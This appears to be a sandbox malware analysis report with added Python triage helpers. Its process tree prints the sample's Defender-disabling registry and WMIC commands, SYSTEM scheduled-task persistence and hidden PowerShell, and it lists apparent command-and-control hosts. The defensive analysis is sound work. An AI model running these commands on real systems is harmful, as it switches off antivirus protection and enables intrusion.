"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bPUvzXzfJRZdhTmsKY"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\xFHhRZnoU\rvmgQR.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "XsUoLYLFLViNzfg" /V1 /F
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Users\Admin\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4156 -ip 4156
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4156 -s 384
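The process tree above shows the sample disabling Defender through Group Policy registry values rather than through Defender's own settings: reg.exe adds each drop directory as a value under the Exclusions\Paths policy key, once per registry view (/reg:32 and /reg:64), writes ThreatIDDefaultAction entries with data 6, registers scheduled tasks whose action is an -EncodedCommand payload or a dropped executable running as SYSTEM, runs gpupdate /force so the policy takes effect, and later launches the reg.exe and PowerShell invocations through forfiles as an indirect launcher. The Python below is an added triage helper, not part of the sandbox report or of the sample: it parses command lines of those shapes, decodes the encoded PowerShell, and emits the reg.exe and schtasks lines that reverse the changes. SAMPLE_LINES are copied from the tree; the action-code table is Defender's documented mapping for this policy (6 = Allow); the forfiles pattern assumes the bare "forfiles" spelling seen here.

```python
import base64
import re

DEFENDER_POLICY = r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"
EXCLUSION_KEY = DEFENDER_POLICY + r"\Exclusions\Paths"                   # value name = path, data 0
THREAT_ACTION_KEY = DEFENDER_POLICY + r"\Threats\ThreatIDDefaultAction"  # value name = threat ID
# Action codes the ThreatIDDefaultAction policy accepts; the sample writes 6, i.e. Allow.
THREAT_ACTIONS = {"1": "Clean", "2": "Quarantine", "3": "Remove", "6": "Allow",
                  "8": "UserDefined", "9": "NoAction", "10": "Block"}
# A token is a double-quoted string (with \" escapes, as cmd.exe renders them) or a bare word.
TOKEN = re.compile(r'"((?:\\"|[^"])*)"|(\S+)')
# -e, -ec, -enc and -EncodedCommand all take the same base64 argument.
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# forfiles ... /c "<cmd>" is the indirect-execution wrapper seen in the tree (bare spelling assumed).
FORFILES = re.compile(r'^forfiles\b.*?\s/c\s+"(.*)"\s*$', re.IGNORECASE)

def tokens(cmdline):
    return [q.replace('\\"', '"') if q else b for q, b in TOKEN.findall(cmdline)]

def flags(args):
    """Map each /flag to the token after it (enough for reg.exe and schtasks syntax)."""
    return {args[j].lower(): args[j + 1] for j in range(len(args) - 1) if args[j].startswith("/")}

def unwrap(cmdline):
    m = FORFILES.match(cmdline)
    return m.group(1).replace('\\"', '"') if m else cmdline

def parse_reg_add(cmdline):
    """Key, value name and data of a 'reg add' found anywhere in the line, else None."""
    t = tokens(cmdline)
    for i in range(len(t) - 2):
        if t[i].lower().rsplit("\\", 1)[-1] in ("reg", "reg.exe") and t[i + 1].lower() == "add":
            f = flags(t[i + 3:])
            return {"key": t[i + 2], "value": f.get("/v"), "data": f.get("/d")}
    return None

def parse_schtasks_create(cmdline):
    """Name, principal, trigger and action of a 'schtasks /CREATE' line, else None."""
    t = tokens(cmdline)
    if not t or t[0].lower().rsplit("\\", 1)[-1] not in ("schtasks", "schtasks.exe") or "/create" not in [x.lower() for x in t]:
        return None
    f = flags(t[1:])
    return {"name": f.get("/tn"), "run_as": f.get("/ru"), "trigger": f.get("/sc"), "command": f.get("/tr")}

def findings(cmdline):
    """Findings for one line: Defender policy tampering, task persistence, decoded PowerShell."""
    cmdline = unwrap(cmdline)
    reg = parse_reg_add(cmdline)
    if reg:
        key = reg["key"].lower()
        if key == EXCLUSION_KEY.lower():
            return [{"kind": "defender_exclusion_path", "path": reg["value"]}]
        if key == THREAT_ACTION_KEY.lower():
            action = THREAT_ACTIONS.get(reg["data"], "unknown(%s)" % reg["data"])
            return [{"kind": "threat_default_action", "threat_id": reg["value"], "action": action}]
        return []
    task = parse_schtasks_create(cmdline)
    if task:  # the /TR action is itself a command line, so a payload hidden in it is surfaced too
        return [dict(kind="scheduled_task", **task)] + findings(task["command"] or "")
    m = ENCODED.search(cmdline)
    if m:  # -EncodedCommand is base64 over the UTF-16LE bytes of the script text
        return [{"kind": "encoded_powershell", "decoded": base64.b64decode(m.group(1)).decode("utf-16-le")}]
    return []

def triage(lines):
    """Aggregate findings; the /reg:32 and /reg:64 writes of one path collapse to one entry."""
    s = {"exclusion_paths": [], "threat_overrides": {}, "decoded_commands": [], "scheduled_tasks": []}
    for f in (f for line in lines for f in findings(line)):
        if f["kind"] == "defender_exclusion_path" and f["path"] not in s["exclusion_paths"]:
            s["exclusion_paths"].append(f["path"])
        elif f["kind"] == "threat_default_action":
            s["threat_overrides"][f["threat_id"]] = f["action"]
        elif f["kind"] == "encoded_powershell":
            s["decoded_commands"].append(f["decoded"])
        elif f["kind"] == "scheduled_task":
            s["scheduled_tasks"].append(f)
    return s

def remediation(summary):
    """reg.exe and schtasks lines that reverse the changes (both views, since the sample wrote both)."""
    cmds = ['reg delete "%s" /v "%s" /f /reg:%s' % (EXCLUSION_KEY, p, v)
            for p in summary["exclusion_paths"] for v in ("32", "64")]
    cmds += ['reg delete "%s" /v %s /f' % (THREAT_ACTION_KEY, t) for t in summary["threat_overrides"]]
    cmds += ['schtasks /DELETE /F /TN "%s"' % t["name"] for t in summary["scheduled_tasks"]]
    return cmds

# Lines copied from the process tree above, one of each shape the parser handles.
SAMPLE_LINES = [
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IfTYFdYohdhRC" /t REG_DWORD /d 0 /reg:32',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IfTYFdYohdhRC" /t REG_DWORD /d 0 /reg:64',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gXItsKzEGiJHAsry /t REG_DWORD /d 0 /reg:32',
    r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6',
    r'forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"',
    r'schtasks /CREATE /TN "gIoHxkEwv" /SC once /ST 16:10:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'schtasks /CREATE /TN "XvjVthUohNRwdLXcW" /SC once /ST 04:58:54 /RU "SYSTEM" /TR "\"C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe\" Zb /GTIadidPc 385133 /S" /V1 /F',
]

if __name__ == "__main__":
    print(*remediation(triage(SAMPLE_LINES)), sep="\n")
```

After the deletions, run gpupdate /force again so Defender re-reads the policy (the sample ran it to apply the values), then confirm with Get-MpPreference that ExclusionPath and ThreatIDDefaultAction_Ids are empty; the dropped directories listed as exclusions are also the places to look for the payloads themselves.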
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jSbXVBiItIINfreBHvLPHxDRe.jSbXVBiItIINfreBHvLPHxDRe | udp |
| US | 8.8.8.8:53 | fivexc5vt.top | udp |
| US | 172.67.161.137:80 | fivexc5vt.top | tcp |
| US | 8.8.8.8:53 | 137.161.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ysYYxpNGjGvjPGjztDBQGphraIQu.ysYYxpNGjGvjPGjztDBQGphraIQu | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.garageserviceoperation.com | udp |
| US | 172.67.202.34:80 | api.garageserviceoperation.com | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 34.202.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | complaintsipzzx.shop | udp |
| US | 172.67.158.159:443 | complaintsipzzx.shop | tcp |
| RU | 194.58.114.223:80 | 194.58.114.223 | tcp |
| US | 8.8.8.8:53 | celebratioopz.shop | udp |
| US | 8.8.8.8:53 | writerospzm.shop | udp |
| US | 8.8.8.8:53 | 159.158.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.114.58.194.in-addr.arpa | udp |
| US | 172.67.166.231:443 | writerospzm.shop | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | deallerospfosu.shop | udp |
| US | 172.67.204.20:443 | deallerospfosu.shop | tcp |
| US | 8.8.8.8:53 | bassizcellskz.shop | udp |
| US | 8.8.8.8:53 | 231.166.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.204.67.172.in-addr.arpa | udp |
| US | 172.67.143.48:443 | bassizcellskz.shop | tcp |
| RU | 82.147.85.52:80 | 82.147.85.52 | tcp |
| US | 8.8.8.8:53 | mennyudosirso.shop | udp |
| US | 104.21.73.43:443 | mennyudosirso.shop | tcp |
| US | 8.8.8.8:53 | 48.143.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.85.147.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.73.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | languagedscie.shop | udp |
| US | 104.21.35.48:443 | languagedscie.shop | tcp |
| US | 8.8.8.8:53 | quialitsuzoxm.shop | udp |
| US | 172.67.137.188:443 | quialitsuzoxm.shop | tcp |
| US | 8.8.8.8:53 | 48.35.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 188.137.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.99.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tenntysjuxmz.shop | udp |
| US | 172.67.141.209:443 | tenntysjuxmz.shop | tcp |
| US | 8.8.8.8:53 | 209.141.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tvezx20vt.top | udp |
| RU | 217.25.94.178:80 | tvezx20vt.top | tcp |
| US | 8.8.8.8:53 | 178.94.25.217.in-addr.arpa | udp |
| NL | 91.92.240.41:7575 | | tcp |
| RU | 217.25.94.178:80 | tvezx20vt.top | tcp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| RU | 217.25.94.178:80 | tvezx20vt.top | tcp |
| NL | 91.92.240.41:7575 | | tcp |
| FR | 193.176.158.185:80 | | tcp |
| FR | 193.176.158.185:80 | | tcp |
| NL | 91.92.240.41:7575 | | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| FR | 193.176.158.185:80 | | tcp |
| FR | 193.176.158.185:80 | | tcp |
| NL | 91.92.240.41:7575 | | tcp |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | 250.117.210.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.201.50.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| GB | 173.222.211.9:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 9.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| NL | 91.92.240.41:7575 | | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| FR | 193.176.158.185:80 | | tcp |
| NL | 91.92.240.41:7575 | | tcp |
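A triage pass over the Network table above, added here as an example and not part of the sandbox report. It separates lookups sent to the sandbox resolver from actual connections, discards reverse-DNS and mDNS noise, de-duplicates repeated connections with a hit count, lists names that were resolved but never contacted, and tolerates rows in which an empty Domain cell shifted the protocol one column left. The allow-list of OS and browser infrastructure and the list of public services that stealer families borrow for payload hosting or dead-drop configuration are assumptions of this example; which of the remaining endpoints are command-and-control is for the analyst to decide. SAMPLE_ROWS are copied from the table.

```python
import re

RESOLVER = "8.8.8.8:53"                      # the sandbox's DNS server: udp rows here are lookups
# Assumptions of this example, not findings of the report: endpoints the detonation host
# contacts on its own, and public services worth a separate look rather than a dismissal.
BENIGN_SUFFIXES = ("bing.com", "bing.net", "lencr.org")
ABUSABLE_SUFFIXES = ("steamcommunity.com", "discordapp.com")
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

def parse_row(line):
    """(country, destination, domain, proto) for a table row, else None.
    Also accepts rows whose empty Domain cell was dropped so that Proto slid left."""
    cells = [c.strip() for c in line.strip().strip("|").split("|")]
    if len(cells) < 3 or cells[0] == "Country":
        return None
    cells += [""] * (4 - len(cells))
    country, dest, domain, proto = cells[:4]
    if proto == "" and domain in ("tcp", "udp"):
        domain, proto = "", domain
    return country, dest, domain, proto

def category(domain):
    if domain.endswith(BENIGN_SUFFIXES):
        return "benign_infra"
    if domain.endswith(ABUSABLE_SUFFIXES):
        return "abusable_service"
    return "investigate"

def triage_network(lines):
    """Separate lookups from connections, drop resolver/reverse-DNS/mDNS noise, de-duplicate."""
    queried, connections = [], {}          # names looked up; (name, ip:port) -> hit count
    for row in filter(None, map(parse_row, lines)):
        _country, dest, domain, proto = row
        if proto == "udp" and dest == RESOLVER:
            if not domain.endswith(".in-addr.arpa") and domain not in queried:
                queried.append(domain)     # reverse lookups are the sandbox's own noise
            continue
        if proto == "udp" and dest.endswith(":5353"):
            continue                       # mDNS on the local segment
        name = "" if IPV4.match(domain) else domain   # raw-IP rows repeat the IP as "domain"
        connections[(name, dest)] = connections.get((name, dest), 0) + 1
    out = {"investigate": [], "abusable_service": [], "benign_infra": [], "dns_only": []}
    for (name, dest), hits in connections.items():
        out[category(name)].append({"domain": name, "dest": dest, "hits": hits})
    out["dns_only"] = [d for d in queried if all(d != name for name, _ in connections)]
    return out

# Rows copied from the table above, including two of the shifted-column rows.
SAMPLE_ROWS = """
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | fivexc5vt.top | udp |
| US | 172.67.161.137:80 | fivexc5vt.top | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | celebratioopz.shop | udp |
| US | 8.8.8.8:53 | writerospzm.shop | udp |
| US | 172.67.166.231:443 | writerospzm.shop | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| NL | 91.92.240.41:7575 | tcp | |
| FR | 193.176.158.185:80 | | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 91.92.240.41:7575 | tcp |
""".strip().splitlines()

if __name__ == "__main__":
    for bucket, entries in triage_network(SAMPLE_ROWS).items():
        print(bucket, entries)
```

The "investigate" bucket is the one to pivot on: raw-IP connections over plain HTTP and a non-standard port (7575) with no DNS lookup at all are the pattern a stealer's hard-coded C2 or a loader's plugin download leaves, and the "dns_only" names are worth keeping as indicators even though the sample never connected to them during this run.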
Files
memory/1988-0-0x0000000000770000-0x0000000000C1D000-memory.dmp
memory/1988-1-0x0000000077554000-0x0000000077556000-memory.dmp
memory/1988-2-0x0000000000771000-0x000000000079F000-memory.dmp
memory/1988-3-0x0000000000770000-0x0000000000C1D000-memory.dmp
memory/1988-4-0x0000000000770000-0x0000000000C1D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
| MD5 | 6a87310841f87d194c991b1ce0f7b998 |
| SHA1 | 38f5b601fb4f0d7cf1f53a10682c1a6c53cf2ce8 |
| SHA256 | 1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d |
| SHA512 | c838f2d581953465bc93dd1481f3370e91c7e7c567243e5410159060a7662dcd3fb1900fa945a76b829f77cc6df70076f6bc33e58794c51a06651c0216762c2f |
memory/1988-18-0x0000000000770000-0x0000000000C1D000-memory.dmp
memory/3204-17-0x00000000006A0000-0x0000000000B4D000-memory.dmp
memory/3204-19-0x00000000006A0000-0x0000000000B4D000-memory.dmp
memory/3204-20-0x00000000006A0000-0x0000000000B4D000-memory.dmp
memory/3204-22-0x00000000006A0000-0x0000000000B4D000-memory.dmp
memory/3204-21-0x00000000006A0000-0x0000000000B4D000-memory.dmp
memory/3204-23-0x00000000006A0000-0x0000000000B4D000-memory.dmp
memory/3204-24-0x00000000006A0000-0x0000000000B4D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe
| MD5 | 7adfc6a2e7a5daa59d291b6e434a59f3 |
| SHA1 | e21ef8be7b78912bed36121404270e5597a3fe25 |
| SHA256 | fbb957b3e36ba1dda0b65986117fd8555041d747810a100b47da4a90a1dfd693 |
| SHA512 | 30f56bd75fe83e8fb60a816c1a0322bc686863d7ab17a763fff977a88f5582c356b4fcfe7c0c9e3e5925bfee7fc44e4ea8b96f82a011ed5e7cd236253187181b |
C:\Users\Admin\AppData\Local\Temp\Continues
| MD5 | 2226738a67da04cef580c99f70b9a514 |
| SHA1 | 48bbfbfdce94231ebc1833b87ff6e79aa716e3b4 |
| SHA256 | e04a1b86ce1a5352f7c3a5ddb8b500993f4342ef4e188ed156009e5271795af1 |
| SHA512 | c653aafd3aa2d320eef1d5b9cf9e58372e778c41147c3d85bcb6e231c8703d19f410ebb2f58f2a9f0671f027fce2baeeec70252e926bb9880128ba6dcedfdb08 |
memory/4444-58-0x00000000006A0000-0x0000000000B4D000-memory.dmp
memory/4444-60-0x00000000006A0000-0x0000000000B4D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000129001\DOC.exe
| MD5 | 2dbdc645b9776239b18f772c30c1a626 |
| SHA1 | 8677b8ea4f077a8c708a0d894e18513828c30322 |
| SHA256 | 2b92d1c34b7f0278703c98e9fd755e061d0f120eea327996b223dfc65610dfcd |
| SHA512 | ae5499ad2c40bd8756d614fea51f48c7b8fca4621b489da97f05cc55cf4a9a6032f9ec0c70ed03915da0e021ed9e4cca16810b18d3825ece9dac25e1d74d6fec |
C:\Users\Admin\AppData\Local\Temp\Sonic
| MD5 | 1b5bba21607d9a9c3293ff564ecf4f1a |
| SHA1 | de790d57fbfae12e649bf65fd9695e36a266696a |
| SHA256 | fc6ba37a8bfe546d8186e92c2f729080b00d4371ef2e8e3a18ec66acc1cf199e |
| SHA512 | b9e23dd79986397c9fe5c1ac150c60c8993f89488645f06e0865abb2491dc3b9949867753d76cab34352445459601c339a6f78ff8b48323951638f9666d6a74a |
C:\Users\Admin\AppData\Local\Temp\Corresponding
| MD5 | 7eb7312237cf8653a876136046ce8b3e |
| SHA1 | 250d61e72b9a6d0d436e04b569459bb69bb2ab9e |
| SHA256 | fa349d460b066e9b325db200251ae35892353462c352728cfb0fa405c293f725 |
| SHA512 | 778fbbec7cd5c9d2aa3623f73604fd7a6e98d3673b50ab7e8ac54c8aa3d955c103d7cdc0838e00f256ade000c979860bf54d3d2b36dd3dcd4fe8fca9f1c82699 |
C:\Users\Admin\AppData\Local\Temp\Mr
| MD5 | 0c3f23378f256b116fca366d08dbd146 |
| SHA1 | c6c92667dea09b7a4b2b00193ee043278854db1e |
| SHA256 | 5defb1b1225282e2ab46d4257416334b5344e5b0a020b4b7900436c59684de65 |
| SHA512 | 0db03b484ce0849bd005ec962e69fea3f8b728739e622ad57519e9411d5257026938b9eb8db050bb355a624f34b19bfe0e0fb8af888bab99d4febb5ec89381f3 |
C:\Users\Admin\AppData\Local\Temp\Speak
| MD5 | 0e16cafd2403c552149e325d90637d12 |
| SHA1 | efe1e6af41751ca9978c3a21c82ef135a8846f21 |
| SHA256 | 93ddbcd9109129656049162e3f6a8d9fffdc5a3da262e0a2bf2bc4624014f7b0 |
| SHA512 | 0251de7abb9a4457cf16dab0b1e88d0897c5b6655cdf27b9c298c1796925ea2514cd2f065106eccd56b97a6804e84f459806d528837bf9718c7c9e525f7159ec |
C:\Users\Admin\AppData\Local\Temp\Dietary
| MD5 | 30a3ed3849e36b4c26a02cf030ea985a |
| SHA1 | d3d29d3ba2c033d0abb6105cd274001e65d07f4e |
| SHA256 | 6d86469ced96b57db84de11f9eac77c8076a3bfa65942776f7cc50625fbd31ca |
| SHA512 | 158aabac6f79393a2a7faed30693f78191bf97771a6125229873abedceef71d5df7d5bb934fdfa1ff4c683df49a158e5ba3efea9a4dd10dce8ba24b3c4fc507d |
C:\Users\Admin\AppData\Local\Temp\Continue
| MD5 | 6184a8fc79d602bc18c0badb08598580 |
| SHA1 | de3a273e7020d43729044e41272c301118cc3641 |
| SHA256 | a8181f349864c6c9a216935894392b75d0d1430d43a255ff3a9ad56c325487e7 |
| SHA512 | 41687b30ecd957eb1b6d332133f1c1d7e01cc1c8bf56526dfa20de3937ed549133e93872380e3b51b63b33134c62d4df91c7e08e908ca18b3e6f9d52e89378cb |
C:\Users\Admin\AppData\Local\Temp\Zinc
| MD5 | 51143491656ae2ee983d709c45a41861 |
| SHA1 | 1cf8eb8d13246195cfc6168524d212c9a65b4681 |
| SHA256 | dc4aac8b9eb62788bd04316293cde7e3d839e828e3e3082a2d81922ca8a94c81 |
| SHA512 | 239f2903b3b5177b32971ae3eb3eab2cc4c3d7856a3839f184c7f59b7e3cd53de4dac3363519e82acd183e564ae688dc8a7e5097c1283699714584ee13bed67d |
C:\Users\Admin\AppData\Local\Temp\Mobile
| MD5 | b81b3a6c6725be1cdd528e5fb3a9aa07 |
| SHA1 | 069d5fd30b48bf5345d21c2af0106325e9372c8f |
| SHA256 | 08e8e54417a8e7007aeedb0399f4e549fc31aaf6031416c8d30306fe350c1f84 |
| SHA512 | 7a04ee23c0b3d832fa518390253c0153829e7ab0907209dc67c5eae687ad648ab18aa7d064e544c1da3b03cc610ed10fe63a73fc5aaa129402a561843aa975e2 |
C:\Users\Admin\AppData\Local\Temp\Template
| MD5 | 0e70f873cb8f5615dd364325b714895a |
| SHA1 | 089a8f5d7d90e7eedd6d02e30aa458440c89d7a7 |
